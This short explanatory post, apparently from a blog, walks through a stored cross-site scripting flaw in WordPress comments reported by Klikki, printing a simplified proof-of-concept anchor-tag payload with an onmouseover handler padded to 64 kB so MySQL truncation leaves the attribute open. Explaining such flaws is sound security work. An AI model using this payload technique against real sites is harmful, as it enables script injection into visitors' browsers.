More details on the WordPress XSS vulnerability found by Klikki. Both real exploits include a
style attribute to widen the mouseover area to the whole viewport; I've left it out here to keep it simple.
The exploit comment is valid HTML and won't be altered by an HTML santizer:
<a title='x onmouseover=alert(unescape(/hello%20world/.source)) AAAAAAAAAAAA...[64 kb]..AAA'></a>
But once truncated by MySQL, the comment will become malformed HTML (note the attribute is left open):
<a title='x onmouseover=alert(unescape(/hello%20world/.source)) AAAAAAAAAAA